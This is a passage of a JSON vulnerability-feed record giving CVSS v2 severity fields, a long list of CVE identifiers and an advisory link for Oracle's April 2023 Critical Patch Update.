"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000656", "CVE-2018-1311", "CVE-2018-14371", "CVE-2018-18074", "CVE-2018-20060", "CVE-2018-20225", "CVE-2018-25032", "CVE-2019-10086", "CVE-2019-10172", "CVE-2019-11287", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-17091", "CVE-2019-18935", "CVE-2019-20388", "CVE-2019-20907", "CVE-2019-20916", "CVE-2020-10693", "CVE-2020-10735", "CVE-2020-11979", "CVE-2020-11987", "CVE-2020-11988", "CVE-2020-13936", "CVE-2020-13954", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15522", "CVE-2020-17521", "CVE-2020-1945", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-28052", "CVE-2020-28500", "CVE-2020-29504", "CVE-2020-29506", "CVE-2020-29507", "CVE-2020-29508", "CVE-2020-35163", "CVE-2020-35164", "CVE-2020-35165", "CVE-2020-35166", "CVE-2020-35167", "CVE-2020-35168", "CVE-2020-35169", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36518", "CVE-2020-6950", "CVE-2020-7009", "CVE-2020-7595", "CVE-2020-7712", "CVE-2020-8908", "CVE-2021-21575", "CVE-2021-22569", "CVE-2021-23017", "CVE-2021-23337", "CVE-2021-23413", "CVE-2021-2351", "CVE-2021-23926", "CVE-2021-27568", "CVE-2021-28168", "CVE-2021-29425", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-31684", "CVE-2021-32808", "CVE-2021-32809", "CVE-2021-33560", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-36090", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37519", "CVE-2021-37533", "CVE-2021-37695", "CVE-2021-38604", "CVE-2021-3918", "CVE-2021-4048", "CVE-2021-40528", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-41973", "CVE-2021-42575", "CVE-2021-43396", "CVE-2021-43859", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44832", "CVE-2021-46848", "CVE-2022-1292", "CVE-2022-1471", "CVE-2022-1586", "CVE-2022-1587", "CVE-2022-2047", "CVE-2022-2048", "CVE-2022-2068", "CVE-2022-2097", "CVE-2022-21824", "CVE-2022-2191", "CVE-2022-2274", "CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22970", "CVE-2022-22971", "CVE-2022-22976", "CVE-2022-22978", "CVE-2022-22979", "CVE-2022-23181", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23308", "CVE-2022-23437", "CVE-2022-23457", "CVE-2022-23491", "CVE-2022-24675", "CVE-2022-24728", "CVE-2022-24729", "CVE-2022-24823", "CVE-2022-24839", "CVE-2022-24891", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315", "CVE-2022-25647", "CVE-2022-25857", "CVE-2022-26336", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-27778", "CVE-2022-27779", "CVE-2022-27780", "CVE-2022-27781", "CVE-2022-27782", "CVE-2022-28199", "CVE-2022-28327", "CVE-2022-28614", "CVE-2022-28738", "CVE-2022-28739", "CVE-2022-2879", "CVE-2022-2880", "CVE-2022-29078", "CVE-2022-29577", "CVE-2022-29599", "CVE-2022-29824", "CVE-2022-30115", "CVE-2022-31081", "CVE-2022-31123", "CVE-2022-31129", "CVE-2022-31130", "CVE-2022-31160", "CVE-2022-31630", "CVE-2022-31690", "CVE-2022-31692", "CVE-2022-3171", "CVE-2022-32212", "CVE-2022-32213", "CVE-2022-32215", "CVE-2022-32222", "CVE-2022-3358", "CVE-2022-33980", "CVE-2022-34169", "CVE-2022-34305", "CVE-2022-3479", "CVE-2022-34917", "CVE-2022-35737", "CVE-2022-3602", "CVE-2022-36033", "CVE-2022-36760", "CVE-2022-37434", "CVE-2022-37436", "CVE-2022-37454", "CVE-2022-3786", "CVE-2022-37865", "CVE-2022-37866", "CVE-2022-3821", "CVE-2022-38749", "CVE-2022-38750", "CVE-2022-38751", "CVE-2022-38752", "CVE-2022-39135", "CVE-2022-39201", "CVE-2022-39229", "CVE-2022-39271", "CVE-2022-40146", "CVE-2022-40149", "CVE-2022-40150", "CVE-2022-40151", "CVE-2022-40152", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-41704", "CVE-2022-41715", "CVE-2022-41881", "CVE-2022-41915", "CVE-2022-41966", "CVE-2022-42003", "CVE-2022-42004", "CVE-2022-42252", "CVE-2022-42889", "CVE-2022-42890", "CVE-2022-42898", "CVE-2022-42915", "CVE-2022-42916", "CVE-2022-42919", "CVE-2022-4304", "CVE-2022-43401", "CVE-2022-43402", "CVE-2022-43548", "CVE-2022-43551", "CVE-2022-43680", "CVE-2022-4415", "CVE-2022-4450", "CVE-2022-45047", "CVE-2022-45061", "CVE-2022-45143", "CVE-2022-45685", "CVE-2022-45693", "CVE-2022-46363", "CVE-2022-46364", "CVE-2022-46908", "CVE-2022-47629", "CVE-2023-0215", "CVE-2023-0286", "CVE-2023-0361", "CVE-2023-0567", "CVE-2023-0568", "CVE-2023-0662", "CVE-2023-1370", "CVE-2023-21896", "CVE-2023-21902", "CVE-2023-21903", "CVE-2023-21904", "CVE-2023-21905", "CVE-2023-21906", "CVE-2023-21907", "CVE-2023-21908", "CVE-2023-21909", "CVE-2023-21910", "CVE-2023-21911", "CVE-2023-21912", "CVE-2023-21913", "CVE-2023-21915", "CVE-2023-21916", "CVE-2023-21917", "CVE-2023-21918", "CVE-2023-21919", "CVE-2023-21920", "CVE-2023-21921", "CVE-2023-21922", "CVE-2023-21923", "CVE-2023-21924", "CVE-2023-21925", "CVE-2023-21926", "CVE-2023-21927", "CVE-2023-21928", "CVE-2023-21929", "CVE-2023-21930", "CVE-2023-21931", "CVE-2023-21932", "CVE-2023-21933", "CVE-2023-21934", "CVE-2023-21935", "CVE-2023-21936", "CVE-2023-21937", "CVE-2023-21938", "CVE-2023-21939", "CVE-2023-21940", "CVE-2023-21941", "CVE-2023-21942", "CVE-2023-21943", "CVE-2023-21944", "CVE-2023-21945", "CVE-2023-21946", "CVE-2023-21947", "CVE-2023-21948", "CVE-2023-21952", "CVE-2023-21953", "CVE-2023-21954", "CVE-2023-21955", "CVE-2023-21956", "CVE-2023-21959", "CVE-2023-21960", "CVE-2023-21962", "CVE-2023-21963", "CVE-2023-21964", "CVE-2023-21965", "CVE-2023-21966", "CVE-2023-21967", "CVE-2023-21968", "CVE-2023-21969", "CVE-2023-21970", "CVE-2023-21971", "CVE-2023-21972", "CVE-2023-21973", "CVE-2023-21976", "CVE-2023-21977", "CVE-2023-21978", "CVE-2023-21979", "CVE-2023-21980", "CVE-2023-21981", "CVE-2023-21982", "CVE-2023-21984", "CVE-2023-21985", "CVE-2023-21986", "CVE-2023-21987", "CVE-2023-21988", "CVE-2023-21989", "CVE-2023-21990", "CVE-2023-21991", "CVE-2023-21992", "CVE-2023-21993", "CVE-2023-21996", "CVE-2023-21997", "CVE-2023-21998", "CVE-2023-21999", "CVE-2023-22000", "CVE-2023-22001", "CVE-2023-22002", "CVE-2023-22003", "CVE-2023-22899", "CVE-2023-23914", "CVE-2023-23915", "CVE-2023-23916", "CVE-2023-23918", "CVE-2023-23919", "CVE-2023-23920", "CVE-2023-23931", "CVE-2023-23934", "CVE-2023-23936", "CVE-2023-24998", "CVE-2023-25136", "CVE-2023-25194", "CVE-2023-25577", "CVE-2023-25613", "CVE-2023-25690", "CVE-2023-27522", "CVE-2023-28708"], "modified": "2023-04-25T00:00:00", "id": "ORACLE:CPUAPR2023", "href": "https://www.oracle.com/security-alerts/cpuapr2023.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}